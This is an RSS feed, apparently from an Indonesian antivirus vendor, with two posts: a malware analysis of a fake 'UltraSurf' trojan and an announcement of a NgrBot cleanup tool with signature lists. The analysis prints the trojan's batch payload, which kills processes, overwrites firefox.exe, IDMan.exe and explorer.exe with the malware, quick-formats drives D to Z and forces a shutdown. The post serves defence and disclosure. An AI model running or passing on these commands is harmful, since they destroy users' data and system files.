<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>pcmav.biz Best Indonesian Antivirus &#187; download</title>
	<atom:link href="http://pcmav.biz/category/download/feed" rel="self" type="application/rss+xml" />
	<link>http://pcmav.biz</link>
	<description>No Virus Allowed</description>
	<lastBuildDate>Sun, 06 May 2012 07:08:57 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>UltraSurf: Memformat Semua Hard Disk</title>
		<link>http://pcmav.biz/ultrasurf-memformat-semua-hard-disk.html</link>
		<comments>http://pcmav.biz/ultrasurf-memformat-semua-hard-disk.html#comments</comments>
		<pubDate>Sat, 06 Aug 2011 07:00:42 +0000</pubDate>
		<dc:creator>pcmav</dc:creator>
				<category><![CDATA[download]]></category>
		<category><![CDATA[pcmav]]></category>
		<category><![CDATA[update]]></category>

		<guid isPermaLink="false">http://pcmav.biz/?p=1096</guid>
		<description><![CDATA[&#160; UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/1.msg_.png"><img class="aligncenter size-full wp-image-1098" title="1.msg" src="http://pcmav.biz/wp-content/uploads/2012/05/1.msg_.png" alt="1.msg  UltraSurf: Memformat Semua Hard Disk" width="529" height="209" /></a></p>
<p>UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan user alami jika menggunakan aplikasi tipuan ini karena sudah dipastikan user akan kehilangan seluruh data di hard disknya.<span id="more-1096"></span></p>
<p><strong>A. Info File</strong></p>
<p>Nama Worm : UltraSurf<br />
Asal : Indonesia<br />
Ukuran File : Random<br />
Packer : UPX 0.89 – 3.xx -&gt; Markus &amp; Laszlo ver. [ 3.07 ]<br />
Pemrograman : Delphi<br />
Icon : Random<br />
Tipe : Trojan, Worm</p>
<p><strong>B. About Malware</strong></p>
<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/2.variant.png"><img class="aligncenter size-full wp-image-1099" title="2.variant" src="http://pcmav.biz/wp-content/uploads/2012/05/2.variant.png" alt="2.variant UltraSurf: Memformat Semua Hard Disk" width="302" height="77" /></a></p>
<p>Variant pertama dari UltraSurf kami dapatkan berasala dari Jakarta. Mungkin hanya buatan orang yang memang berniat untuk menghapus setiap data user yang terdapat pada drive lain selain drive C. Hal ini dimaksudkan agar malware tetap bisa menjalankan aksinya untuk memformat setiap drive setelah di jalankan.</p>
<p>Seperti yang terlihat pada gambar di atas, UltraSurf berasal dari Indonesia. Setelah di UnPack, sangat terlihat tujuan dari UltraSurf setelah dijalankan oleh user.</p>
<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/3.hexa_.png"><img class="aligncenter size-full wp-image-1100" title="3.hexa" src="http://pcmav.biz/wp-content/uploads/2012/05/3.hexa_.png" alt="3.hexa  UltraSurf: Memformat Semua Hard Disk" width="500" /></a></p>
<p><strong>C. Companion/File yang dibuat</strong></p>
<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/4.batfile.png"><img class="aligncenter size-full wp-image-1101" title="4.batfile" src="http://pcmav.biz/wp-content/uploads/2012/05/4.batfile.png" alt="4.batfile UltraSurf: Memformat Semua Hard Disk" width="384" height="71" /></a></p>
<p>Setelah user menjalankan UltraSurf, malware ini akan membuat 1 buah file dengan nama ultrasurf.bat di folder temporary. Pada variant D, file bat yang dibuat menggunakan nama “alaskan ip.bat”. Batch file ini hanya bersifat sementara yang dibuat setelah UltraSurf di jalankan dan otomatis dihapus setelah selesai mengeksekusi seluruh perintahnya.</p>
<p><strong>D. Hasil Infeksi</strong><br />
Dengan perintah-perintah bat file ini, jelas benar-benar terlihat apa saja yang akan dilakukan oleh UltraSurf.<br />
Menghentikan proses dengan nama idman.exe, firefox.exe, explorer.exe</p>
<blockquote><p>taskkill /f /im idman.exe<br />
taskkill /f /im firefox.exe<br />
taskkill /f /im explorer.exe</p></blockquote>
<p>mengcopy file hostnya dan melakukan overwrite ke beberapa file seperti IDMan.exe, firefox.exe, explorer, explorer.exe</p>
<blockquote><p>xcopy ultrasurf.exe /h /r /c /y &#8220;C:\Program Files\Internet Download Manager\IDMan.exe&#8221;<br />
xcopy ultrasurf.exe /h /r /c /y &#8220;C:\Program Files\Mozilla Firefox\firefox.exe&#8221;<br />
xcopy ultrasurf.exe /h /r /c /y &#8220;C:\windows\explorer&#8221;<br />
xcopy ultrasurf.exe /h /r /c /y &#8220;C:\windows\explorer.exe&#8221;</p></blockquote>
<p>Memformat semua hard disk mulai dari drive D sampai Z.</p>
<blockquote><p>echo.<br />
Format D: /Q /X /y<br />
echo.<br />
Format E: /Q /X /y<br />
echo.<br />
Format F: /Q /X /y<br />
echo.<br />
Format G: /Q /X /y<br />
echo.<br />
Format H: /Q /X /y<br />
echo.<br />
Format I: /Q /X /y<br />
echo.<br />
Format J: /Q /X /y<br />
echo.<br />
Format K: /Q /X /y<br />
echo.<br />
Format L: /Q /X /y<br />
echo.<br />
Format M: /Q /X /y<br />
echo.<br />
Format N: /Q /X /y<br />
echo.<br />
Format 0: /Q /X /y<br />
echo.<br />
Format P: /Q /X /y<br />
echo.<br />
Format Q: /Q /X /y<br />
echo.<br />
Format R: /Q /X /y<br />
echo.<br />
Format S: /Q /X /y<br />
echo.<br />
Format T: /Q /X /y<br />
echo.<br />
Format U: /Q /X /y<br />
echo.<br />
Format V: /Q /X /y<br />
echo.<br />
Format W: /Q /X /y<br />
echo.<br />
Format X: /Q /X /y<br />
echo.<br />
Format Y: /Q /X /y<br />
echo.<br />
Format Z: /Q /X /y</p></blockquote>
<p>Dan yang terakhir adalah melakukan proses shuting down</p>
<blockquote><p>start shutdown.exe -f -t 0 –s</p></blockquote>
<p>Meskipun tidak membuat host untuk dijadikan startup, UltraSurf memanfaatkan user yang tidak tidak tahu bahwa file firefox.exe sudah di hapus dan digantikan dengan host UltraSurf. Selain itu IDMan.exe adalah salah satu file dari software Internet Download Manager yang di jalankan saat startup, jadi UltraSurf yang sudah mengganti file IDMan.exe dengan host buatannya akan berjalan saat startup.</p>
<p><strong>E. Pembersihan</strong></p>
<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/5.pcmav_.png"><img class="aligncenter size-full wp-image-1102" title="5.pcmav" src="http://pcmav.biz/wp-content/uploads/2012/05/5.pcmav_.png" alt="5.pcmav  UltraSurf: Memformat Semua Hard Disk" width="500" /></a></p>
<p><strong>PCMAV 5.4 Update Build1</strong></p>
<p>Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build1 telah hadir dengan penambahan 29 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.</p>
<p>Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.</p>
<p>Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:</p>
<p><a title="SendSpace.com" href="http://www.sendspace.com/file/z0y1vd">SendSpace.com</a></p>
<p><a title="zippyshare.com" href="http://www2.zippyshare.com/v/8678932/file.html">ZippyShare.com</a> (mirror)</p>
<p><a title="RapidShare.com" href="https://rapidshare.com/files/146006781/update.vdb">RapidShare.com</a> (mirror)</p>
<p>Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.</p>
<p>Daftar tambahan virus hingga PCMAV 5.4 Update Build1:</p>
<p>Fandi.vbs.C<br />
Fandi.vbs.C.inf<br />
NgrBot<br />
NgrBot.bat<br />
NgrBot.dat<br />
NgrBot.drp.A<br />
NgrBot.drp.B<br />
NgrBot.exe.A<br />
NgrBot.exe.B<br />
NgrBot.inf<br />
NgrBot.lnk<br />
Pluto.C<br />
Pluto.C.drp<br />
Pluto.C.htm<br />
Redlof.vbs.B<br />
Redlof.vbs.B.drp<br />
Redlof.vbs.B.inf<br />
RezaTera.B<br />
RezaTera.B.drp<br />
RezaTera.B.url<br />
Rieysha-Jogja.E<br />
Rieysha-Jogja.E.hosts<br />
Rieysha-Jogja.E.vbs<br />
UltraSurf.A<br />
UltraSurf.A.bat<br />
UltraSurf.B<br />
UltraSurf.C<br />
UltraSurf.D<br />
UltraSurf.D.bat</p>
<p>taskkill /f /im idman.exe</p>
]]></content:encoded>
			<wfw:commentRss>http://pcmav.biz/ultrasurf-memformat-semua-hard-disk.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PCMAV Express for NgrBot</title>
		<link>http://pcmav.biz/pcmav-express-for-ngrbot.html</link>
		<comments>http://pcmav.biz/pcmav-express-for-ngrbot.html#comments</comments>
		<pubDate>Sat, 06 Aug 2011 06:53:33 +0000</pubDate>
		<dc:creator>pcmav</dc:creator>
				<category><![CDATA[download]]></category>
		<category><![CDATA[pcmav]]></category>
		<category><![CDATA[update]]></category>

		<guid isPermaLink="false">http://pcmav.biz/?p=1089</guid>
		<description><![CDATA[Malware canggih dengan kemampuan rootkit terus bermunculan. NgrBot adalah contoh terbaru trojan yang mampu mencuri data identitas/password Anda saat berselancar di Internet. Media penyebaran NgrBot cukup luas, ia dapat menginfeksi komputer melalui shortcut dan autorun.inf yang dibuat pada flashdisk yang terinfeksi, juga menyebar melalui link jejaring sosial maupun chat pada client messenger. Setelah aktif, ia [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://pcmav.biz/wp-content/uploads/2012/05/NgrBotKiller.png"><img class="aligncenter size-full wp-image-1090" title="NgrBotKiller" src="http://pcmav.biz/wp-content/uploads/2012/05/NgrBotKiller.png" alt="NgrBotKiller PCMAV Express for NgrBot" width="514" height="322" /></a></p>
<p>Malware canggih dengan kemampuan rootkit terus bermunculan. NgrBot adalah contoh terbaru trojan yang mampu mencuri data identitas/password Anda saat berselancar di Internet.</p>
<p>Media penyebaran NgrBot cukup luas, ia dapat menginfeksi komputer melalui shortcut dan autorun.inf yang dibuat pada flashdisk yang terinfeksi, juga menyebar melalui link jejaring sosial maupun chat pada client messenger. Setelah aktif, ia akan memblok sejumlah website antivirus dan melakukan koneksi ke web-web tertentu, karena itu sangat disarankan Anda memutuskan terlebih dahulu koneksi Internet sebelum melakukan pembersihan.<span id="more-1089"></span></p>
<p>Nama NgrBot sendiri diambil dari string yang terdapat pada tubuh malware yang telah di-decrypt, trojan ini stealth di memory, dan juga melindungi filenya dengan melakukan hook API function tertentu sehingga file tersebut tidak terlihat oleh pengguna.</p>
<p><strong>PCMAV Express for NgrBot</strong> dibuat untuk membersihkan NgrBot yang in-the-wild, menghentikan proses NgrBot di memory komputer yang terinfeksi, melakukan unhook API function dan mendeteksi serta menghapus file NgrBot yang tersembunyi.</p>
<p><strong>Aturan Penggunaan:</strong><br />
Jalankan PCMAV for NgrBot.<br />
Pastikan user Anda memiliki hak setara Administrator.<br />
Nonaktifkan fungsi Autorun (link referensi: http://support.microsoft.com/kb/967715).<br />
Pasang flashdisk yang terinfeksi pada komputer agar ikut dibersihkan oleh PCMAV Express for NgrBot.<br />
Pastikan komputer Anda *tidak* terkoneksi ke jaringan atau Internet selama proses scan.<br />
Setelah selesai, sangat disarankan untuk melakukan restart dan scan ulang (jika perlu).<br />
Pastikan seluruh PC yang telah terhubung di dalam jaringan juga telah bebas NgrBot, sebelum PC Anda kembali terkoneksi ke jaringan.</p>
<p>Secara regular engine utama PCMAV akan di-update mengikuti perkembangan NgrBot.</p>
<p>Pada halaman ini kami juga menyediakan PCMAV Express for NgrBot untuk di-download pada link dibawah ini (link dapat berubah jika ada update baru).</p>
<p>Last Update (09-01-2012):</p>
<p>Total 36 varian NgrBot yang sudah bisa dibasmi menggunakan PCMAV Express for NgrBot:<br />
- NgrBot.A<br />
- NgrBot.B<br />
- NgrBot.C<br />
- NgrBot.D<br />
- NgrBot.E<br />
- NgrBot.F<br />
- NgrBot.G<br />
- NgrBot.H<br />
- NgrBot.I<br />
- NgrBot.J<br />
- NgrBot.K<br />
- NgrBot.L<br />
- NgrBot.M<br />
- NgrBot.N<br />
- NgrBot.O<br />
- NgrBot.P<br />
- NgrBot.Q<br />
- NgrBot.R<br />
- NgrBot.S<br />
- NgrBot.T<br />
- NgrBot.U<br />
- NgrBot.V<br />
- NgrBot.W<br />
- NgrBot.X<br />
- NgrBot.Y<br />
- NgrBot.Z<br />
- NgrBot.AA<br />
- NgrBot.AB<br />
- NgrBot.AC<br />
- NgrBot.AD<br />
- NgrBot.AE<br />
- NgrBot.AF<br />
- NgrBot.AG<br />
- NgrBot.AH<br />
- NgrBot.AI<br />
- NgrBot.AJ</p>
<p><strong><a title="Download PCMAV Express for NgrBot" href="http://www.sendspace.com/file/kbfpri">Download PCMAV Express for NgrBot</a></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://pcmav.biz/pcmav-express-for-ngrbot.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

